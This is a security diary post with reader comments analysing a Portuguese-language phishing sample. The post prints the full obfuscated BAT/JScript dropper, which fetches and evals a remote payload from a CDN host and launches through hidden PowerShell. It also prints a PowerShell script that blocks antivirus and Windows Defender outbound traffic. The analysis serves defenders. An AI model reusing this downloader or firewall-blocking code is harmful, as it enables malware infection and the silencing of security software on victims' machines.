My next class:

Malicious script dropping an executable signed by Avast?

Published: 2017-08-23. Last Updated: 2017-08-23 07:36:30 UTC
by Xavier Mertens (Version: 1)
9 comment(s)

Yesterday, I found an interesting sample that I started to analyze… It reached my spam trap attached to an email in Portuguese with the subject: "Venho por meio desta solicitar orçamento dos produtos” ("I hereby request the products budget”). There was one attached ZIP archive: PanilhaOrcamento.zip (SHA1: 3c159f65ba88bb208df30822d2a88b6531e4d0a7) with a VT score of 0/58[1].

Inside the archive, a simple BAT file: "Panilha Orcamento Contabil 32f5.bat" (SHA1: c191821ddb1db46349afdb08789312ce418696d1) with was unknown on VT. The content is simple: it generates a .wsf file that is spawned through Powershell:

@echo off
set bmh="%HOMEPATH%\btmkfxbumrria.wsf"
echo ^<?xml version=^"1.0^" ?^>^<job id=^"7824^"^>^<script language=^"JSCript^"^>^<![CDATA[var t5lTT;(function(){function a(){function b(){function b(){function c(){function d(){var g=function(d){if(b=== null){b= 0};var f=^"M^";var g=^"^";if(b=== false){b(null,0,false,1);return};f= f+ ^"S^";if(!b){b(0,1);b= null};if(c=== true){c(true);if(b=== null){b= null;return}else {return}};if(!b){b();return};f= f+ ^"X^";f= f+ ^"M^";f= f+ ^"L^";if(c=== true){c(1,1)};f= f+ ^"2^";if(c== 0){if(!b){b(true,0)};c();c= false;if(b=== 1){b();b= true;return};return}else {f= f+ ^".^"};f= f+ ^"X^";if(!c){if(!b){b()};c(0);if(b=== null){b();b= null;return};c= true;return};f= f+ ^"M^";if(b== null){b(null,true);b= null};f= f+ ^"L^";f= f+ ^"H^";f= f+ ^"T^";f= f+ ^"T^";if(!c){c();if(b=== true){return};c= null};g= ^"123^";f= f+ ^"P^";if(b=== true){b();b= 0};if(c=== null){c= null}else {if(b== 1){b()};if(d== 2){if(c=== null){c(1,0);if(b=== true){b= null;return};return};return  new ActiveXObject(f)}};return false};var j=function(k,f,g){if(!c){c= null;return};var h=^"^";if(!d){d(false,null);if(!c){c= false;if(!b){return};return};return};var j=^"^";if(b== null){b()};if(f== 3){h= ^"G^";if(b=== null){b(false,true,null);b= null};h= h+ ^"E^";h= h+ ^"T^"};if(!d){if(!c){return};return};if(g== 4){if(b=== 1){return}else {if(!d){if(!b){b= 1};d(null);d= false;if(!b){b= 1};return}};if(b== false){b(null,false,null,0,true);b= 1;return}else {j= ^"hXXps://1591523753.rsc.cdn77[.]org/p2r.php?^"}};k.Open(h,j,false)};if(c== null){c= false};var f=function(){try{var f=g(2);j(f,3,4);if(!d){d(null);if(b== null){b(0,false,1)};d= 0};f.Send();var h=f.Status;if(h+ 2== 202){var c=function(){return f.responseText};return c()}}catch(e){};if(b== true){b(false);b= true;return};if(d== 1){if(!b){b= null;return};d= null;return};if(b== 1){return};return false};if(!c){c= true;return}else {if(b=== null){b();b= 1};for(i= 0;i^< 5;i++){if(c=== null){c();if(!b){return};c= 0};var h=f();if(h){if(!b){b(0,null);return};if(!d){d(0)};eval(h+ ^"downAndExec(\^"https://1591523753.rsc.cdn77.org\^", \^"648Q\^");^");break}else {WScript.Sleep(5000)}}}}if(!b){b()};t5lTT= d;if(!d){d(1);if(!b){return}else {d= false};return};t5lTT()}(c)()}if(b=== 0){b(0,0);b= 0;return};(b)()}(b)()}(a)()})()]]^>^</script^>^</job^> > %bmh%
%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -command Start-Process '"%bmh%”'

A payload is downloaded from hXXps://1591523753.rsc.cdn77[.]org/p2r.php? (note that a valid SSL certificate is used) and two files are created:

C:\rx hsdj\o\i\x\ffax bnzx\fvenotify.exe (SHA1: 6d28d5453d0c2ca132ba3b3d7f0a121427090c1eb52f7d2a5c3e4e5440411bc7)
C:\rx hsdj\o\i\x\ffax bnzx\secur32.dll (SHA1: 2ee0c761a25310e34c9d3c9d3e810192d8bbd10d4051522e3eefdc1bd71a17bb)

The file fvenotify.exe is reported clean on VT[2] and is signed by Avast as their SafeZone Browser[3]. When I re-executed the WSF file, the name changed to "ftp.exe".


But the suspicious PE file generates a new PowerShell script in %TEMP% and executes it. It modifies the current Windows firewall rules to prevent some antivirus to "phone home”. Here is the script:

function Add-FirewallRule {
    param( 
        $name,
        $appName = $null,
        $serviceName = $null
    )

    $fw = New-Object -ComObject hnetcfg.fwpolicy2 
    $rule = New-Object -ComObject HNetCfg.FWRule
        
    $rule.Name = $name
    if ($appName -ne $null) { $rule.ApplicationName = $appName }
    if ($serviceName -ne $null) { $rule.serviceName = $serviceName }
    $rule.Protocol = 6
    $rule.Enabled = $true
    $rule.Grouping = "@firewallapi.dll,-23255"
    $rule.Profiles = 7
    $rule.Action = 0
    $rule.EdgeTraversal = $false
    $rule.Direction = 2
    
    $fw.Rules.Add($rule)
}

function FirewallEnable {
    param(
        $profile
    )

    $fw = New-Object -ComObject hnetcfg.fwpolicy2
    
    $fw.FirewallEnabled($profile) = $true
}

FirewallEnable 1
FirewallEnable 2
FirewallEnable 4

Add-FirewallRule "3txqSDF2" "%ProgramFiles%\AVAST Software\Avast\avastui.exe"
Add-FirewallRule "Ytb7kY9a" "%ProgramFiles%\AVAST Software\Avast\AvastSvc.exe"
Add-FirewallRule "xgmQL8Wb" "%ProgramFiles%\AVAST Software\Avast\setup\instup.exe"

Add-FirewallRule "ABZBkNHB" "%ProgramFiles(x86)%\AVG\Antivirus\avgui.exe"
Add-FirewallRule "eLGeMJyw" "%ProgramFiles(x86)%\AVG\Antivirus\AVGSvc.exe"
Add-FirewallRule "9LEY6ZsT" "%ProgramFiles(x86)%\AVG\Antivirus\setup\instup.exe"

Add-FirewallRule "uNUG4JaK" "%ProgramFiles%\Windows Defender\MpCmdRun.exe"
Add-FirewallRule "d9mjBtLt" "%ProgramFiles%\Windows Defender\MSASCui.exe"

Remove-Item $MyInvocation.MyCommand.Definition

The rules are indeed created:

The PE file fvenotify.exe is added to the Run registry for persistence. I'll check deeper the PE file but did you already detect the same behaviour? Please share!

[1] https://www.virustotal.com/#/file/9329de591b51c367908f2916307a4d2277caa2c766f2cecac8d06e02a2416246/detection
[2] https://www.virustotal.com/#/file/6d28d5453d0c2ca132ba3b3d7f0a121427090c1eb52f7d2a5c3e4e5440411bc7/detection
[3] https://www.avast.com/f-safezone

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

9 comment(s)
My next class:

Comments

More info here: https://www.welivesecurity.com/br/2017/07/06/downandexec-malwares-bancarios/
The certificate on hxxps 1591523753.rsc.cdn77[.]org is really horrible. It contains quite a number of DNS alternative names, including www.secure.nsw.gov.au (which is an Australian counter terrorism site). See below for all of them. This certificate should be revoked ASAP - I don't understand how CA's comply with signing requests for such obviously malicious certificates. I have personally not attempted to ask for revocation (after a bad experience with Thawte about 2 weeks ago).

Certificate details:
Issuer: DigiCert SHA2 Secure Server CA
Serial number: 0cc313a63029f149d8efc2436b2eab48
Valid from: Friday, 9 June, 2017 00:00:00 UTC
Valid to: Tuesday, 5 June, 2018 12:00:00 UTC
SHA-1 hash of the binary (ASN.1) certificate: ‎3f c9 d6 ff 89 6e 40 f1 f2 26 b3 c6 ce 0a 50 40 53 35 f7 1f (without spaces: 3fc9d6ff896e40f1f226b3c6ce0a50405335f71f)

DNS alt names separated by spaces: rsc.cdn77.org www.secure.nsw.gov.au www.cdn77.com info.gossipslots.eu cdn.medio.com static.netverify.com static.popads.net c1.popads.net cdn77.clickfun.com content.thunderkick.com cdn.xsolla.com cdns.kinguin.net cdn.ometria.com cdn77.clickfuncasino.com assets.victorinox.com i.gocollette.com cdn.ctnsnet.com cdn.sscontent.com cdn.exactag.com cdn.garantibil.se cloud.majestic.co.uk cdn.webstaurantstore.com cdn.contentdn.net cdn.nailsuperstore.com info.drakecasino.eu media.lingeriestyling.com info.gtbets.eu cdn.levenhuk.com cdn.propellant.dk static.scania.com cdn.majestic.co.uk download.poikosoft.com videos.universidadedoingles.com.br download.ifortuna.cz alt.cdn.scarabresearch.com download.g5e.com s1.abocdn.com i1.abocdn.com resources.gocollette.com download.efortuna.pl download.ifortuna.sk static.btnwrkscnd.com cdn.fashiola.de cdn.casarenodirect.com p.redlights.de p.redlights.nl p.quartier-rouge.be images.rigbyandpellershop.com cdn.justuno.com cdn.assets.newmarketholidays.co.uk p.redlights.be cdn.dev-specialdeals.g5e.com cdn.specialdeals.g5e.com cdn.tinypop.com s1.popmajor.com *.rsc.cdn77.org *.cdn77-ssl.net *.c.cdn77.org *.download.cdn77.com cdn.professionalthemes.nyc cdn.cvp.com info.gtrevenue.com info.drakeaffiliates.eu
With respect to using Avast's SafeZone Browser "fvenotify.exe": in https://www.virustotal.com/#/file/6d28d5453d0c2ca132ba3b3d7f0a121427090c1eb52f7d2a5c3e4e5440411bc7/community user PayloadSecurity mentions "change_reg_value_operation", "create_reg_key_operation" etcetera.

Possibly fvenotify.exe runs as SYSTEM and permits a DLL running in non-admin mode to change system-wide firewall and/or registry settings (if that is the case, enabling privilege escalation)?
My conscience convinced me to contact DigiCert and ask them to have the rsc.cdn77.org certificate (s/n 0cc313a63029f149d8efc2436b2eab48) revoked. I hope this happens soon. I also notified www.secure.nsw.gov.au via the form on their website.

Update 20170824 19:28 UTC: My apologies, the Digicert certificate htpps certificate I refer to above was apparently NOT acquired by cyber criminals but instead by CDN77.org - AFAIK with consent of the owners of the domain listed in the certificate.

Nevertheless, 1591523753.rsc.cdn77.org was either acquired by cyber criminals, or it was compromised. One can only hope that the cyber criminals have not obtained access to the private key associated with the (public key in the) certificate.

Furthermore, all domain names in the certificate seem to resolve to 185.59.222.* and 185.59.221.* and they rotate (at least from where I'm looking). This includes www.secure.nsw.gov.au and the malicious site. So one should also hope that CDN77 has their virtual routing tricks properly configured - because your browser cannot distinguish between 1591523753.rsc.cdn77.org (in fact *rsc.cdn77.org) and www.secure.nsw.gov.au, neither based on DNS and the IP-address, nor on the certificate.

So neither the certificate, nor DNS, guarantees that you cannot end up on a site LOOKING like www.secure.nsw.gov.au (with a valid certificate) while in fact you're looking at contents on 1591523753.rsc.cdn77.org.

IMO these CDN tricks seriously undermine trust in https certificates.
My apologies, the Digicert certificate htpps certificate I refer to above was apparently NOT acquired by cyber criminals but instead by CDN77.org - AFAIK with consent of the owners of the domain listed in the certificate.

Nevertheless, 1591523753.rsc.cdn77.org was either acquired by cyber criminals, or it was compromised. One can only hope that the cyber criminals have not obtained access to the private key associated with the (public key in the) certificate.

Furthermore, all domain names in the certificate seem to resolve to 185.59.222.* and 185.59.221.* and they rotate (at least from where I'm looking). This includes www.secure.nsw.gov.au and the malicious site. So one should also hope that CDN77 has their virtual routing tricks properly configured - because your browser cannot distinguish between 1591523753.rsc.cdn77.org and www.secure.nsw.gov.au, neither based on DNS and the IP-address, neither on the certificate.

So neither the certificate, nor DNS, guarantees that you cannot end up on a site LOOKING like www.secure.nsw.gov.au (with a valid certificate) while in fact you're looking at contents on 1591523753.rsc.cdn77.org.

IMO these CDN tricks seriously undermine trust in https certificates.
Just to clarify, CDN77 is global CDN provider, similar to Cloudflare or Akamai, because of this they do use shared certificate.
Hi,

Thank you very much for your heavy involvement in this case, we appreciate what you are doing in terms of security.

As for the URLs concerning CDN77.com SSL security:

- the certificate assigned to “rsc.cdn77.org” is used in alt name for our customers. We are monitoring their files and actions and take immediate steps in case something happens,
- We’ve already suspended this content from our network, as we always do in case of any suspicious content on our network, to protect end users.
- CDN77.com is in cooperation with DigiCert company, police and any further security organs that care and protect the users.
- We would like to assure you that we care 100% about the security and care not to cause any harm on the network on the global scale.

Feel free to contact us with any reports directly on support@cdn77.com and we will take immediate care of it.

Jana Jurik - CDN77.com
Product Manager

CDN77.com | Content Delivery Network
support@cdn77.com
Hi,

Thank you very much for your heavy involvement in this case, we appreciate what you are doing in terms of security.

As for the URLs concerning CDN77.com SSL security:

- the certificate assigned to “rsc.cdn77.org” is used in alt name for our customers. We are monitoring their files and actions and take immediate steps in case something happens,
- We’ve already suspended this content from our network, as we always do in case of any suspicious content on our network, to protect end users.
- CDN77.com is in cooperation with DigiCert company, police and any further security organs that care and protect the users.
- We would like to assure you that we care 100% about the security and care not to cause any harm on the network on the global scale.

Feel free to contact us with any reports directly on support@cdn77.com and we will take immediate care of it.

Jana Jurik - CDN77.com
Product Manager

CDN77.com | Content Delivery Network
support@cdn77.com
More than the certificate has been revoked ...

$ nslookup rsc.cdn77.org ns1.cdn77.org.
Server: UnKnown
Address: 37.235.105.100
*** UnKnown can't find rsc.cdn77.org: Non-existent domain

$ nslookup rsc.cdn77.org ns2.cdn77.org.
Server: UnKnown
Address: 37.235.105.200
*** UnKnown can't find rsc.cdn77.org: Non-existent domain

$ nslookup www.cdn77.org ns2.cdn77.org.
Server: UnKnown
Address: 37.235.105.200
*** UnKnown can't find www.cdn77.org: Non-existent domain

Diary Archives